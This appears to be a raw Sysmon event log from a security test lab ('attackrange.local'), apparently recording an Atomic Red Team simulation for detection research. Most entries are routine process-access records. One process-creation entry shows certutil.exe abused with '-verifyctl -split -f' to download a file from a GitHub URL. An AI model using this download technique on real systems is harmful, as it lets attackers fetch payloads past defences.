21:49:51.390{896A638B-B5CB-6058-1600-00000000AE01}13085440C:\Windows\System32\svchost.exe{896A638B-B3FF-605B-7F69-00000000AE01}3440C:\Windows\System32\certutil.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917636Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.389{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B3FF-605B-7F69-00000000AE01}3440C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917635Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.371{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B3FF-605B-7F69-00000000AE01}3440C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917634Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.371{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B3FF-605B-7F69-00000000AE01}3440C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917633Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.371{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B3FF-605B-7F69-00000000AE01}3440C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917632Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.369{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B3FF-605B-8069-00000000AE01}4236C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917631Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.368{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B3FF-605B-8069-00000000AE01}4236C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917630Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.363{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B3FF-605B-7F69-00000000AE01}3440C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917629Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.362{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B3FF-605B-7F69-00000000AE01}3440C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917628Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.362{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B3FF-605B-7F69-00000000AE01}3440C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917627Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.362{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B3FF-605B-8069-00000000AE01}4236C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917626Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.362{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B3FF-605B-7F69-00000000AE01}3440C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917625Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.362{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B3FF-605B-8069-00000000AE01}4236C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917624Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.362{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B3FF-605B-8069-00000000AE01}4236C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917623Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.361{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B3FF-605B-8069-00000000AE01}4236C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917622Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.354{896A638B-B5CB-6058-1600-00000000AE01}13085440C:\Windows\System32\svchost.exe{896A638B-B3FF-605B-8069-00000000AE01}4236C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917621Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.354{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B3FF-605B-8069-00000000AE01}4236C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917620Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.350{896A638B-B3FF-605B-8069-00000000AE01}42365816C:\Windows\system32\conhost.exe{896A638B-B3FF-605B-7F69-00000000AE01}3440C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917619Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.342{896A638B-B8DD-6058-9202-00000000AE01}36323472C:\Windows\system32\csrss.exe{896A638B-B3FF-605B-8069-00000000AE01}4236C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917618Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.340{896A638B-B8DD-6058-9202-00000000AE01}36324724C:\Windows\system32\csrss.exe{896A638B-B3FF-605B-7F69-00000000AE01}3440C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917617Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.338{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917616Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.337{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917615Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.337{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917614Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.337{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917613Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.337{896A638B-B5C8-6058-0500-00000000AE01}396412C:\Windows\system32\csrss.exe{896A638B-B3FF-605B-7F69-00000000AE01}3440C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917612Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.337{896A638B-B3F6-605B-7769-00000000AE01}51966688C:\Windows\system32\wbem\wmiprvse.exe{896A638B-B3FF-605B-7F69-00000000AE01}3440C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000005917611Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.337{896A638B-B3FF-605B-7F69-00000000AE01}3440C:\Windows\System32\certutil.exe10.0.14393.4169 (rs1_release.210107-1130)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.exe"C:\Windows\System32\certutil.exe" ―verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt C:\Windows\system32\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=BF7CEA72AE186A10239F830F93492A73,SHA256=A50DFE408565C2BB011D013AC43E616B2A595B1D06EB9B083F519672732498DA,IMPHASH=442218E88D4D6AA0BE3165DD7B20A4C4{896A638B-B3F6-605B-7769-00000000AE01}5196C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 23542300x80000000000000005917610Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.213{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=622152F8630F72EB2C96CC744FB90E34,SHA256=DEBBCDB63453B96D98928BE7FC0D89E68115A2F5DC44CF62239B9CD7B552EB0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917609Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:47.732{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1504-false10.0.1.12-8000- 23542300x8000000000000000638472Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:52.585{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60186A3E1C3E43683ED22C14171EFF70,SHA256=F59B1DA3186F7CDFEF17D0244FEE7AFE37252D92A8C9B48A78D8E423C7B64366,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917649Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:52.729{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917648Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:52.729{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917647Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:52.358{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D450974FFAE07B9322EDB601E2B9DB6F,SHA256=423D26711DBBDF30FDE2F854FD9C10729613CD7DC095F557181FC0A6841513AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917646Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:52.339{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3407BD13E80D55215C6A5649EC0B31D9,SHA256=9D14EB600C4A0672F3B2041FA5A0FA1604A4E8EFEA591C0AA9D5CF14B877E3E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917645Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:52.230{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=370CA9B30F4AF2A0D261CE6392818167,SHA256=EE07DCE05C986EBB31C6A291380E6D616F075D12C5387F14280F8D1F2196E6A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638473Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:53.601{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94E0350CC6D91DD08D642F48DED34127,SHA256=7D9B1BA94E45FA666AF7D4E679DE533C42D2CA6E5B9DF2C66B617D9D0C971329,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917652Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 